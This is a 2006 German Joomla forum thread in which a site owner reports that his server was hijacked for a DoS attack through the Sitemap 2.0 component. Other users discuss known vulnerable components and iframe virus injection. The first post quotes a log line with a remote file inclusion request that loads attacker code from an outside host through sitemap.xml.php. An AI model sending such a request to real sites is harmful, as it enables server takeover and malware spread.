+ Antworten
Ergebnis 1 bis 6 von 6

Thema: Sicherheitsproblem mit Sidemap

  1. #1
    Neu an Board Avatar von saxman
    Registriert seit
    22.06.2005
    Ort
    Ingolstadt
    Alter
    47
    Beiträge
    49
    Bedankte sich
    5
    Erhielt 4 Danksagungen
    in 4 Beiträgen

    Standard Sicherheitsproblem mit Sidemap

    Hallo zusammen,

    am Wochenende wurde mein Server gehackt und für eine DoS Attacke mißbraucht. Mein Partner und ich haben heraus gefunden, das der Angreifer über das Sidemap Modul Code einschleusen konnte. Hier der Auszug auf der Logdatei meines Server:

    193.25.197.123 - - [18/Jul/2006:17:50:33 +0200] "GET /cms/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.podgorz.cc/en5.php?? HTTP/1.0" 200 1086 "-" "Mozilla/5.0"

    Ich habe die Komponente Sidemap 2.0 verwendet. Ausschlaggebend war die Datei sitemap.xml.php (siehe Logeintrag). Derzeit ist mein Apache noch deaktiviert, ich habe aber diese Komponente aus meinem Joomla entfernt.
    Ist diese Lücke schon bekannt?

    Gruss saxman
    for a better world.........take Open Source !!

  2. #2
    Kommt häufiger vorbei Avatar von RasCas
    Registriert seit
    12.01.2006
    Beiträge
    320
    Bedankte sich
    25
    Erhielt 34 Danksagungen
    in 32 Beiträgen

    Standard

    Jepp, ist in der Liste kritischer Komponenten gelistet.

  3. Erhielt Danksagungen von:


  4. #3
    Neu an Board Avatar von saxman
    Registriert seit
    22.06.2005
    Ort
    Ingolstadt
    Alter
    47
    Beiträge
    49
    Bedankte sich
    5
    Erhielt 4 Danksagungen
    in 4 Beiträgen

    Standard

    Dumme Frage meineseits.........wo finde ich diese Liste?
    for a better world.........take Open Source !!

  5. #4
    Neu an Board
    Registriert seit
    24.02.2006
    Beiträge
    57
    Bedankte sich
    0
    Erhielt 8 Danksagungen
    in 7 Beiträgen

    Standard Joomap

    Hallo,

    weiß jemand ob diese Sicherheitslücken auch in Joomap vorhanden sind ?

    Gruß,

    Björn

  6. #5
    Kommt häufiger vorbei Avatar von RasCas
    Registriert seit
    12.01.2006
    Beiträge
    320
    Bedankte sich
    25
    Erhielt 34 Danksagungen
    in 32 Beiträgen

    Standard

    Steht jedenfalls nicht in der Liste
    ... wobei das noch nichts heissen muss.

    PS: Für die, die die Liste immer noch nicht gefunden haben.
    1. Post im Sicherheitsforum -> erstem link folgen -> erster Post im engl. Forum

  7. #6
    Moderator Avatar von flotte
    Registriert seit
    20.03.2005
    Ort
    Neustadt
    Beiträge
    5.301
    Bedankte sich
    66
    Erhielt 1.258 Danksagungen
    in 1.101 Beiträgen

    Standard

    Zitat Zitat von saxman
    Hallo zusammen,

    am Wochenende wurde mein Server gehackt und für eine DoS Attacke mißbraucht. Mein Partner und ich haben heraus gefunden, das der Angreifer über das Sidemap Modul Code einschleusen konnte.
    Über dieses Modul werden auch iframes in den Code gesetzt, die beim Aufruf Viren hochladen.

+ Antworten

Ähnliche Themen

  1. Sicehrheitsproblem bei Zoom-Galery
    Von vocaris im Forum Mambo Komponenten
    Antworten: 0
    Letzter Beitrag: 09.11.2004, 07:36
  2. Sicherheitsproblem oder Horax ??
    Von eisbaerwol im Forum Allgemeine Fragen zu Mambo 4.5.0
    Antworten: 7
    Letzter Beitrag: 26.08.2004, 15:51
  3. Ich hab ein Sicherheitsproblem
    Von Stromberger im Forum Allgemeine Fragen zu Mambo 4.5.0
    Antworten: 3
    Letzter Beitrag: 08.11.2003, 12:36

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein